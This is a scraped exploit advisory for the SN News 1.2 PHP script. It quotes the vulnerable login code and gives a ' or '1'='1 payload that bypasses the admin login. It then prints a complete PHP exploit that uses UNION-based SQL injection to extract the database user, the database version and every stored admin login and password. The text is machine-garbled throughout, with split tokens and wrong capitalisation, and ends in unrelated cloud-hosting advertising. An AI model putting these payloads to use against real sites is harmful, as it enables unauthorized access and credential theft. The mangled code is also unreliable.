SN News <= 1.2 (/admin/loger. php) Admin Bypass Remote SQL Injection Vulnerability
Affected Version 1.2
: Http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news
The author is not responsible for any harm
######################################## ######################################
# The defect is located in-/admin/logar. php [4-15]:
4. $ login = $ _ POST ["login"];
5. $ senha = $ _ POST ["senha"];
6. $ SQL = "select * from news_adm where login = '$ login' AND senha =' $ senha '";
7. $ query = mysql_query ($ SQL );
8. $ nr = mysql_num_rows ($ query );
9. if ($ nr> 0 ){
10. $ _ SESSION ["admin"] = "on ";
11. echo "<script>
12. location. href = '../'
13. </script>
14 .";
15 .}
# Notes:
# As you can see there is no validation or any filter to variables $ login and $ senha.
# See line 6, so you can inject SQL query by using $ login and $ senha variables.
# SQL Injection PoC:
# Http://www.2cto.com/sn_news/admin/login.htm
# Login: 'or '1' = '1
# Senha: 'or '1' = '1
# This injection will bypass the admin login screen.
# Title: SN News <= 1.2 SQL Injection
Signature <? Php
/*
Example:
$ Php mnews. php http://www.2cto.com/scripts/mnews/
*/
Error_reporting (E_ERROR );
Set_time_limit (0 );
@ Ini_set ("default_socket_timeout", 30 );
Function hex ($ string ){
$ Hex = ''; // PHP 'dim' =]
For ($ I = 0; $ I <strlen ($ string); $ I ++ ){
$ Hex. = dechex (ord ($ string [$ I]);
}
Return '0x '. $ hex;
}
Echo "\ nSN News <= 1.2 SQL Injection exploit \ n ";
Echo "Discovered and written by WhiteCollarGroup \ n ";
Echo "www.wcgroup.host56.com-whitecollar_group@hotmail.com \ n ";
If ($ argc! = 2 ){
Echo "Usage: \ n ";
Echo "php $ argv [0] <target url> \ n ";
Echo "Example: \ n ";
Echo "php $ argv [0] http://www.website.com/snnews0000n ";
Exit;
}
$ Target = $ argv [1];
If (substr ($ target, (strlen ($ target)-1 ))! = "/"){
$ Target. = "/";
}
$ Inject = $ target. "visualiza. php? Id =-0 '% 20 ";
$ Token = uniqid ();
$ Token_hex = hex ($ token );
Echo "[*] Trying to get informations... \ n ";
$ Infos = file_get_contents ($ inject. urlencode ("union all select 1, concat (". $ token_hex. ", user (),". $ token_hex. ", version (),". $ token_hex. "), 3,4, 5 --"));
$ Infos_r = array ();
Preg_match_all ("/$ token (. *) $ token (. *) $ token/", $ infos, $ infos_r );
$ User = $ infos_r [1] [0];
$ Version = $ infos_r [2] [0];
If ($ user ){
Echo "[*] MySQL version: $ version \ n ";
Echo "[*] MySQL user: $ user \ n ";
} Else {
Echo "[-] Error while getting informations. \ n ";
}
Echo "[*] Getting users... \ n ";
$ I = 0;
While (true ){
$ Dados_r = array ();
$ Dados = file_get_contents ($ inject. urlencode ("union all select 1, concat (". $ token_hex. ", login ,". $ token_hex. ", senha ,". $ token_hex. "), 3,4, 5 from news_adm limit $ I, 1 --"));
Preg_match_all ("/$ token (. *) $ token (. *) $ token/", $ dados, $ dados_r );
$ Login = $ dados_r [1] [0];
$ Senha = $ dados_r [2] [0];
If ($ login) AND ($ senha )){
Echo "-+-\ n ";
Echo "User: $ login \ n ";
Echo "Pass: $ senha \ n ";
} Else {
Break;
}
$ I ++;
}
Echo "-+-\ n ";
If ($ I! = 0 ){
Echo "[!] Admin login: {$ target} admin/\ n ";
} Else {
Echo "[-] Exploit failed. Make sure that's server is using a valid version of SN News without Apache mod_security. \ nWe're sorry .";
}
Echo "\ n ";
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
